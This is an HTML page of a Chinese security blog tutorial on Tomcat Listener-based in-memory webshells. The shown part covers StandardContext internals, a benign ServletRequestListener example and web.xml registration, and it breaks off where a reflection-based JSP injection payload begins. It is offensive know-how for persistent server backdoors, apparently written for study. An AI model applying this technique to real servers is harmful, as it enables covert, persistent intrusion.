<!--
  ╔══════════════════════════════════════════════════════════════╗
  ║                                                              ║
  ║   🎮 CTF Easter Egg Challenge!                               ║
  ║                                                              ║
  ║   Congratulations! You found the hidden comment!             ║
  ║                                                              ║
  ║   Here's your clue: The flag is the site owner's name        ║
  ║   in lowercase letters.                                      ║
  ║                                                              ║
  ║   Open browser console and type:                             ║
  ║   secret.flag("your_answer")                                 ║
  ║                                                              ║
  ║   Or try: secret.hint() for more clues                       ║
  ║                                                              ║
  ╚══════════════════════════════════════════════════════════════╝
-->

<!DOCTYPE html><html lang="zh-CN" data-theme="dark">

<head>
  <meta charset="utf-8">
  <style id="waifu-preload">#waifu{opacity:0;background:transparent;}#waifu canvas,#waifu #live2d,#waifu-toolbar{background:transparent;}</style>
  <meta name="hexo-theme" content="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.33.1" theme-name="Stellar" theme-version="1.33.1">
  <link rel="manifest" href="/manifest.json">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="apple-mobile-web-app-title" content="Blog">
  
  
  <meta name="generator" content="Hexo 7.3.0">
  <meta http-equiv='x-dns-prefetch-control' content='on' />
  
  <meta name="renderer" content="webkit">
  <meta name="force-rendering" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="HandheldFriendly" content="True" >
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#000">
  <meta name="theme-color" content="#f9fafb">
  <title>代码审计 | Listener —— Tomcat 内存马 回显问题 反射总结 - blog</title>

  
    <meta name="description" content="代码审计 | Listener —— Tomcat 内存马 回显问题 反射总结目录 前置：StandardContext 回顾 ApplicationEventDispatcher ServletRequestListener 示例（静态注册） web.xml 中注册 Listener 的标准写法 动态注入 Payload（无回显版） Listener 与 Filter&#x2F;Servlet">
<meta property="og:type" content="article">
<meta property="og:title" content="代码审计 | Listener —— Tomcat 内存马 回显问题 反射总结">
<meta property="og:url" content="https://wr0ld.github.io/posts/9a18f0c4/">
<meta property="og:site_name" content="blog">
<meta property="og:description" content="代码审计 | Listener —— Tomcat 内存马 回显问题 反射总结目录 前置：StandardContext 回顾 ApplicationEventDispatcher ServletRequestListener 示例（静态注册） web.xml 中注册 Listener 的标准写法 动态注入 Payload（无回显版） Listener 与 Filter&#x2F;Servlet">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://wr0ld.github.io/avatar.png">
<meta property="article:published_time" content="2026-04-10T05:00:00.000Z">
<meta property="article:modified_time" content="2026-04-11T08:35:22.296Z">
<meta property="article:author" content="wr0ld">
<meta property="article:tag" content="代码审计">
<meta property="article:tag" content="Java">
<meta property="article:tag" content="Tomcat">
<meta property="article:tag" content="内存马">
<meta property="article:tag" content="RCE">
<meta property="article:tag" content="Listener">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://wr0ld.github.io/avatar.png">
  
  
  
  <meta name="keywords" content="代码审计,Java,Tomcat,内存马,RCE,Listener">

  <!-- feed -->
  

  <link rel="stylesheet" href="/css/main.css?v=1.0.0">


  
    <link rel="shortcut icon" href="/avatar.png">
  

  

  <script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"wr0ld","sameAs":[],"image":"/avatar.png"},"dateCreated":"2026-04-10T13:00:00+08:00","dateModified":"2026-04-11T16:35:22+08:00","datePublished":"2026-04-10T13:00:00+08:00","description":"","headline":"代码审计 | Listener —— Tomcat 内存马 回显问题 反射总结","mainEntityOfPage":{"@type":"WebPage","@id":"https://wr0ld.github.io/posts/9a18f0c4/"},"publisher":{"@type":"Organization","name":"wr0ld","sameAs":[],"image":"/avatar.png","logo":{"@type":"ImageObject","url":"/avatar.png"}},"url":"https://wr0ld.github.io/posts/9a18f0c4/","keywords":"代码审计, Java, Tomcat, 内存马, RCE, Listener","thumbnailUrl":"https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/oMBqEeiBAifEs2uANzhcAcJIQAiAweAr4FE1Pw~tplv-dy-vqe2-sr-v2_1920_1334_q80.jpg","image":1}</script>
  
</head>
<body>

<div class="l_body content" id="start" layout="post" type="tech" ><aside class="l_left"><div class="sidebg"></div><div class="leftbar-container">


<header class="header"><div class="logo-wrap"><a class="avatar" href="/about/"><div class="bg" style="opacity:0;background-image:url(https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/rainbow64@3x.webp);"></div><img no-lazy class="avatar" src="/avatar.png" onerror="javascript:this.classList.add('error');this.src='https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/image/2659360.svg';"></a><a class="title" href="/"><div class="main">blog</div></a></div></header>

<div class="nav-area">

<nav class="menu dis-select"><a class="nav-item active" title="博客" href="/" style="color:#1BCDFC"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" fill-rule="evenodd" d="M5.879 2.879C5 3.757 5 5.172 5 8v8c0 2.828 0 4.243.879 5.121C6.757 22 8.172 22 11 22h2c2.828 0 4.243 0 5.121-.879C19 20.243 19 18.828 19 16V8c0-2.828 0-4.243-.879-5.121C17.243 2 15.828 2 13 2h-2c-2.828 0-4.243 0-5.121.879M8.25 17a.75.75 0 0 1 .75-.75h3a.75.75 0 0 1 0 1.5H9a.75.75 0 0 1-.75-.75M9 12.25a.75.75 0 0 0 0 1.5h6a.75.75 0 0 0 0-1.5zM8.25 9A.75.75 0 0 1 9 8.25h6a.75.75 0 0 1 0 1.5H9A.75.75 0 0 1 8.25 9" clip-rule="evenodd"/><path fill="currentColor" d="M5.235 4.058C5 4.941 5 6.177 5 8v8c0 1.823 0 3.058.235 3.942L5 19.924c-.975-.096-1.631-.313-2.121-.803C2 18.243 2 16.828 2 14v-4c0-2.829 0-4.243.879-5.121c.49-.49 1.146-.707 2.121-.803zm13.53 15.884C19 19.058 19 17.822 19 16V8c0-1.823 0-3.059-.235-3.942l.235.018c.975.096 1.631.313 2.121.803C22 5.757 22 7.17 22 9.999v4c0 2.83 0 4.243-.879 5.122c-.49.49-1.146.707-2.121.803z" opacity=".5"/></svg></a><a class="nav-item" title="实验室" href="/lab/" style="color:#F39C12"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M3.464 3.464C2 4.93 2 7.286 2 12s0 7.071 1.464 8.535C4.93 22 7.286 22 12 22s7.071 0 8.535-1.465C22 19.072 22 16.714 22 12s0-7.071-1.465-8.536C19.072 2 16.714 2 12 2S4.929 2 3.464 3.464" opacity=".5"/><path fill="currentColor" fill-rule="evenodd" d="M7.47 8.47a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.75.75 0 1 1-1.06-1.06L8.94 11L7.47 9.53a.75.75 0 0 1 0-1.06M12 14.25a.75.75 0 0 0 0 1.5h4a.75.75 0 0 0 0-1.5z" clip-rule="evenodd"/></svg></a><a class="nav-item" title="游戏" href="/games/" style="color:#FF6B6B"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M2 9.5c0-2.496 0-3.744.494-4.696a4.5 4.5 0 0 1 1.81-1.81C5.256 2.5 6.504 2.5 9 2.5h6c2.496 0 3.744 0 4.696.494a4.5 4.5 0 0 1 1.81 1.81C22 5.756 22 7.004 22 9.5v5c0 2.496 0 3.744-.494 4.696a4.5 4.5 0 0 1-1.81 1.81C18.744 21.5 17.496 21.5 15 21.5H9c-2.496 0-3.744 0-4.696-.494a4.5 4.5 0 0 1-1.81-1.81C2 18.244 2 16.996 2 14.5z" opacity=".5"/><path fill="currentColor" fill-rule="evenodd" d="M6.25 12a.75.75 0 0 1 .75-.75h2.25V9a.75.75 0 0 1 1.5 0v2.25H13a.75.75 0 0 1 0 1.5h-2.25V15a.75.75 0 0 1-1.5 0v-2.25H7a.75.75 0 0 1-.75-.75m9.5-1a1 1 0 1 0 0 2a1 1 0 0 0 0-2m2 3a1 1 0 1 0 2 0a1 1 0 0 0-2 0" clip-rule="evenodd"/></svg></a><a class="nav-item" title="卡牌" href="javascript:if(window.CardSystem)window.CardSystem.showPanel()" style="color:#E91E63"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M3.464 3.464C2 4.93 2 7.286 2 12s0 7.071 1.464 8.535C4.93 22 7.286 22 12 22s7.071 0 8.535-1.465C22 19.072 22 16.714 22 12s0-7.071-1.465-8.536C19.072 2 16.714 2 12 2S4.929 2 3.464 3.464" opacity=".5"/><path fill="currentColor" fill-rule="evenodd" d="M7.5 6.75a.75.75 0 0 0-.75.75v1.5c0 .414.336.75.75.75h9a.75.75 0 0 0 .75-.75v-1.5a.75.75 0 0 0-.75-.75zm-.75 5.25a.75.75 0 0 1 .75-.75h4.5a.75.75 0 0 1 0 1.5H7.5a.75.75 0 0 1-.75-.75m.75 2.25a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 0-1.5z" clip-rule="evenodd"/></svg></a><a class="nav-item" title="设置" href="/settings/" style="color:#9B59B6"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M12 2c-1.5 0-2.5 1.5-2.5 3v.5c0 .5-.5 1-1 1H7c-1.5 0-2.5 1-3 2.5l-.5 2c-.5 1.5.5 3 2 3.5l.5.2c.5.2 1 .7 1 1.3v.5c0 .5-.5 1-1 1.3l-.5.2c-1.5.5-2.5 2-2 3.5l.5 2c.5 1.5 1.5 2.5 3 2.5h1.5c.5 0 1-.5 1-1V20c0-.5.5-1 1-1h2c.5 0 1 .5 1 1v.5c0 .5.5 1 1 1H17c1.5 0 2.5-1 3-2.5l.5-2c.5-1.5-.5-3-2-3.5l-.5-.2c-.5-.2-1-.7-1-1.3v-.5c0-.5.5-1 1-1.3l.5-.2c1.5-.5 2.5-2 2-3.5l-.5-2c-.5-1.5-1.5-2.5-3-2.5h-1.5c-.5 0-1 .5-1 1V6c0 .5-.5 1-1 1h-2c-.5 0-1-.5-1-1v-.5c0-.5-.5-1-1-1" opacity=".5"/><path fill="currentColor" d="M12 15a3 3 0 1 0 0-6a3 3 0 0 0 0 6" clip-rule="evenodd"/></svg></a><a class="nav-item" title="关于" href="/about/" style="color:#3DC550"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4s-4 1.79-4 4s1.79 4 4 4" opacity=".5"/><path fill="currentColor" fill-rule="evenodd" d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10s10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5l1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z" clip-rule="evenodd"/></svg></a></nav>
</div>
<div class="widgets">
<div class="search-wrapper" id="search-wrapper"><form class="search-form"><a class="search-button" onclick="document.getElementById(&quot;search-input&quot;).focus();"><svg t="1705074644177" viewBox="0 0 1025 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1560" width="200" height="200"><path d="M1008.839137 935.96571L792.364903 719.491476a56.783488 56.783488 0 0 0-80.152866 0 358.53545 358.53545 0 1 1 100.857314-335.166073 362.840335 362.840335 0 0 1-3.689902 170.145468 51.248635 51.248635 0 1 0 99.217358 26.444296 462.057693 462.057693 0 1 0-158.255785 242.303546l185.930047 185.725053a51.248635 51.248635 0 0 0 72.568068 0 51.248635 51.248635 0 0 0 0-72.978056z" p-id="1561"></path><path d="M616.479587 615.969233a50.428657 50.428657 0 0 0-61.498362-5.534852 174.655348 174.655348 0 0 1-177.525271 3.484907 49.403684 49.403684 0 0 0-58.833433 6.76482l-3.074918 2.869923a49.403684 49.403684 0 0 0 8.609771 78.10292 277.767601 277.767601 0 0 0 286.992355-5.739847 49.403684 49.403684 0 0 0 8.404776-76.667958z" p-id="1562"></path></svg></a><input type="text" class="search-input" id="search-input" placeholder="站内搜索"></form><div id="search-result"></div><div class="search-no-result">没有找到内容！</div></div>

<widget class="widget-wrapper todo-widget collapsible-widget"><div class="widget-header dis-select"><span class="name">任务简报 <span class="todo-count">(12)</span></span><span class="collapse-toggle"><i class="fas fa-chevron-down"></i></span></div><div class="widget-body fs14"><div class="todo-list"><div class="todo-item doing"><span class="todo-content">内存马 Valve</span></div><div class="todo-item doing"><span class="todo-content">log4j 内存马</span></div><div class="todo-item doing"><span class="todo-content">EDUSRC实战漏洞挖掘复盘脱敏</span></div><div class="todo-item doing"><span class="todo-content">小迪vpc1-5 Windows系统web内网横向域内</span></div><div class="todo-item doing"><span class="todo-content">rootkit 的 shellcode 嵌入</span></div><div class="todo-item doing"><span class="todo-content">fastjson 1.2.68 → 1.2.80</span></div><div class="todo-item doing"><span class="todo-content">java cc4 5 7</span></div><div class="todo-item doing"><span class="todo-content">Shiro 721</span></div><div class="todo-item doing"><span class="todo-content">信息收集</span></div><div class="todo-item doing"><span class="todo-content">PHP反序列化 + Pop Chain构造</span></div><div class="todo-item doing"><span class="todo-content">云上服务</span></div><div class="todo-item doing"><span class="todo-content">docker容器逃逸</span></div></div></div></widget>
</div>

</div></aside><div class="l_main" id="main">





<div class="article banner top">
  <div class="content">
    <div class="top bread-nav footnote"><div class="left"><div class="flex-row" id="breadcrumb"><a class="cap breadcrumb" href="/">主页</a>
<span class="sep"></span><a class="cap breadcrumb" href="/">文章</a><span class="sep"></span><a class="cap breadcrumb-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a> <span class="sep"></span> <a class="cap breadcrumb-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/%E5%86%85%E5%AD%98%E9%A9%AC/">内存马</a></div>
<div class="flex-row" id="post-meta"><span class="text created">发布于：<time datetime="2026-04-10T05:00:00.000Z">2026-04-10</time></span><span class="sep"></span><span class="text word-count">字数：15257</span><span class="sep"></span><span class="text img-count">图片：8</span></div></div></div>
    
    <div class="bottom only-title">
      
      <div class="text-area">
        <h1 class="text title"><span>代码审计 | Listener —— Tomcat 内存马 回显问题 反射总结</span></h1>
        
      </div>
    </div>
    
  </div>
  </div><article class="md-text content"><h1 id="代码审计-Listener-——-Tomcat-内存马-回显问题-反射总结"><a href="#代码审计-Listener-——-Tomcat-内存马-回显问题-反射总结" class="headerlink" title="代码审计 | Listener —— Tomcat 内存马 回显问题 反射总结"></a>代码审计 | Listener —— Tomcat 内存马 回显问题 反射总结</h1><h2 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h2><ul>
<li><a href="#%E5%89%8D%E7%BD%AEstandardcontext-%E5%9B%9E%E9%A1%BE">前置：StandardContext 回顾</a></li>
<li><a href="#applicationeventdispatcher">ApplicationEventDispatcher</a></li>
<li><a href="#servletrequestlistener-%E7%A4%BA%E4%BE%8B%E9%9D%99%E6%80%81%E6%B3%A8%E5%86%8C">ServletRequestListener 示例（静态注册）</a></li>
<li><a href="#webxml-%E4%B8%AD%E6%B3%A8%E5%86%8C-listener-%E7%9A%84%E6%A0%87%E5%87%86%E5%86%99%E6%B3%95">web.xml 中注册 Listener 的标准写法</a></li>
<li><a href="#%E5%8A%A8%E6%80%81%E6%B3%A8%E5%85%A5-payload%E6%97%A0%E5%9B%9E%E6%98%BE%E7%89%88">动态注入 Payload（无回显版）</a></li>
<li><a href="#listener-%E4%B8%8E-filterservlet-%E7%9A%84%E5%B7%AE%E5%BC%82%E5%AF%B9%E6%AF%94">Listener 与 Filter&#x2F;Servlet 的差异对比</a></li>
<li><a href="#%E5%9B%9E%E6%98%BE%E9%97%AE%E9%A2%98%E4%B8%BA%E4%BB%80%E4%B9%88-listener-%E4%B8%8D%E8%83%BD%E7%9B%B4%E6%8E%A5%E5%9B%9E%E6%98%BE">回显问题：为什么 Listener 不能直接回显？</a></li>
<li><a href="#%E8%A7%A3%E5%86%B3%E5%9B%9E%E6%98%BE%E5%8F%8D%E5%B0%84%E7%A1%AC%E6%8B%BF-response">解决回显：反射硬拿 Response</a></li>
<li><a href="#%E5%85%B6%E4%BB%96%E5%B8%B8%E8%A7%81-listener-%E6%8E%A5%E5%8F%A3%E7%AE%80%E4%BB%8B">其他常见 Listener 接口简介</a></li>
<li><a href="#%E5%8F%8D%E5%B0%84%E8%A1%A5%E5%85%85%E5%85%AD%E5%A4%A7%E6%A0%B8%E5%BF%83%E8%83%BD%E5%8A%9B">反射补充：六大核心能力</a></li>
<li><a href="#%E6%80%BB%E7%BB%93">总结</a></li>
</ul>
<hr>
<h2 id="前置：StandardContext-回顾"><a href="#前置：StandardContext-回顾" class="headerlink" title="前置：StandardContext 回顾"></a>前置：StandardContext 回顾</h2><p>Listener 型内存马的注入原理，依然依赖于 Tomcat 内部的 <code>StandardContext</code>。</p>
<table>
<thead>
<tr>
<th>对象</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td><code>StandardContext</code></td>
<td>Tomcat 中代表一个 Web 应用的核心对象，里面存了 Filter、Servlet、<strong>Listener</strong> 等组件</td>
</tr>
</tbody></table>
<p>可以用这个类比来理解三种组件的区别：</p>
<ul>
<li><strong>Filter</strong>：像一个安检闸机，所有请求都过一遍</li>
<li><strong>Servlet</strong>：像一个具体柜台，请求最终被它处理</li>
<li><strong>Listener</strong>：像一个感应门铃，有人进门（请求开始）、出门（请求结束）、新顾客到店（Session 创建）……都会触发</li>
</ul>
<p>Listener 就存在 <code>StandardContext</code> 的 <code>applicationEventListeners</code> 字段里，执行调度器是 <code>ApplicationEventDispatcher</code>，它负责从这个列表里取出 Listener 并调用。</p>
<hr>
<h2 id="ApplicationEventDispatcher"><a href="#ApplicationEventDispatcher" class="headerlink" title="ApplicationEventDispatcher"></a>ApplicationEventDispatcher</h2><p><code>ApplicationEventDispatcher</code> 是 Tomcat <strong>运行时自动调用</strong>的调度器。</p>
<p>只要把 Listener 实例<strong>放进 <code>applicationEventListeners</code> 列表</strong>，Tomcat 在处理每个请求时，<code>ApplicationEventDispatcher</code> 就会自动从列表里拿到你的 Listener 并调用它。</p>
<p>和 Filter 对比一下差异就很明显了：</p>
<ul>
<li>动态注册 <strong>Filter</strong>：需要操作 <code>FilterDef</code> + <code>FilterMap</code> + <code>FilterChain</code>（重新创建），比较繁琐</li>
<li>动态注册 <strong>Listener</strong>：<strong>只操作一个列表</strong>，没有映射，没有链，简单得多</li>
</ul>
<hr>
<h2 id="ServletRequestListener-示例（静态注册）"><a href="#ServletRequestListener-示例（静态注册）" class="headerlink" title="ServletRequestListener 示例（静态注册）"></a>ServletRequestListener 示例（静态注册）</h2><p>先看一个静态注册的 <code>ServletRequestListener</code>，理解它的工作机制。</p>
<p>作用是：<strong>每次 HTTP 请求进入 Tomcat 时，自动执行 <code>requestInitialized</code> 方法；请求结束时执行 <code>requestDestroyed</code> 方法。</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.servlet.ServletRequestEvent;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.ServletRequestListener;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.annotation.WebListener;</span><br><span class="line"></span><br><span class="line"><span class="comment">// @WebListener 相当于在 web.xml 里注册</span></span><br><span class="line"><span class="comment">// 动态注入时不需要这个注解，因为我们是手动反射添加到 StandardContext 的</span></span><br><span class="line"><span class="comment">// applicationEventListeners 列表里，静态注册才需要注解或 web.xml</span></span><br><span class="line"><span class="meta">@WebListener</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">SimpleListener</span> <span class="keyword">implements</span> <span class="title class_">ServletRequestListener</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 静态块：在类第一次被 JVM 加载时执行，只执行一次，这里只是调试用的</span></span><br><span class="line">    <span class="comment">// 注意：动态注入的 Listener 是运行时创建的对象，不会触发静态块</span></span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;=== SimpleListener 类被加载了 ===&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// @Override 表示重写接口中的方法，Java 的语法习惯，不写也能运行</span></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="comment">// 只要有请求就会进来，内存马中大部分核心恶意逻辑放在这里</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">requestInitialized</span><span class="params">(ServletRequestEvent sre)</span> &#123;</span><br><span class="line">        <span class="comment">// 请求刚进来时执行</span></span><br><span class="line">        System.out.println(<span class="string">&quot;[Listener] 请求来了！&quot;</span>);</span><br><span class="line">        System.out.println(<span class="string">&quot;请求的IP：&quot;</span> + sre.getServletRequest().getRemoteAddr());</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 这里可以放恶意代码，比如：</span></span><br><span class="line">        <span class="comment">// - 执行命令</span></span><br><span class="line">        <span class="comment">// - 读取请求参数</span></span><br><span class="line">        <span class="comment">// - 修改响应内容（不过需要拿到 response，稍麻烦）</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="comment">// 只要请求结束就会触发，内存马中较少在这里放核心恶意逻辑</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">requestDestroyed</span><span class="params">(ServletRequestEvent sre)</span> &#123;</span><br><span class="line">        <span class="comment">// 请求结束时执行</span></span><br><span class="line">        System.out.println(<span class="string">&quot;[Listener] 请求结束了&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>启动 Tomcat 服务后，类被加载就会显示：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/Listener_image1.png"></p>
<p>每次刷新页面就会多一次输出，包含请求开始、IP 地址、请求结束三条日志：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/Listener_image2.png"></p>
<blockquote>
<p>这里 IP 显示的是 <code>0:0:0:0:0:0:0:1</code>（简写 <code>::1</code>），这是 <strong>IPv6</strong> 的本地回环地址，等价于 IPv4 的 <code>127.0.0.1</code>。</p>
</blockquote>
<hr>
<h2 id="web-xml-中注册-Listener-的标准写法"><a href="#web-xml-中注册-Listener-的标准写法" class="headerlink" title="web.xml 中注册 Listener 的标准写法"></a>web.xml 中注册 Listener 的标准写法</h2><p>静态注册除了用 <code>@WebListener</code> 注解，也可以写在 <code>web.xml</code> 里：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">web-app</span> <span class="attr">xmlns</span>=<span class="string">&quot;http://xmlns.jcp.org/xml/ns/javaee&quot;</span></span></span><br><span class="line"><span class="tag">         <span class="attr">xmlns:xsi</span>=<span class="string">&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span></span></span><br><span class="line"><span class="tag">         <span class="attr">xsi:schemaLocation</span>=<span class="string">&quot;http://xmlns.jcp.org/xml/ns/javaee</span></span></span><br><span class="line"><span class="string"><span class="tag">         http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd&quot;</span></span></span><br><span class="line"><span class="tag">         <span class="attr">version</span>=<span class="string">&quot;4.0&quot;</span>&gt;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">&lt;!-- 注册 ServletRequestListener --&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- 填写的是全限定类名（包名 + 类名） --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">listener</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">listener-class</span>&gt;</span>com.demo.SimpleListener<span class="tag">&lt;/<span class="name">listener-class</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">listener</span>&gt;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">&lt;!-- 也可以同时注册其他 Listener，比如 HttpSessionListener --&gt;</span></span><br><span class="line">    <span class="comment">&lt;!--</span></span><br><span class="line"><span class="comment">    &lt;listener&gt;</span></span><br><span class="line"><span class="comment">        &lt;listener-class&gt;com.demo.MySessionListener&lt;/listener-class&gt;</span></span><br><span class="line"><span class="comment">    &lt;/listener&gt;</span></span><br><span class="line"><span class="comment">    --&gt;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">&lt;!-- 其他配置（如 Servlet、Filter）可以继续写在这里 --&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">web-app</span>&gt;</span></span><br></pre></td></tr></table></figure>

<hr>
<h2 id="动态注入-Payload（无回显版）"><a href="#动态注入-Payload（无回显版）" class="headerlink" title="动态注入 Payload（无回显版）"></a>动态注入 Payload（无回显版）</h2><p>和 Filter、Servlet 一样，先两层反射获取 <code>StandardContext</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ServletContext &gt;&gt; ApplicationContext &gt;&gt; StandardContext</span><br></pre></td></tr></table></figure>

<figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.lang.reflect.Field&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;javax.servlet.ServletRequestEvent&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;javax.servlet.ServletRequestListener&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;org.apache.catalina.core.StandardContext&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;org.apache.catalina.core.ApplicationContext&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.util.List&quot;</span> %&gt;</span><br><span class="line"></span><br><span class="line">&lt;%</span><br><span class="line"><span class="comment">// ========== 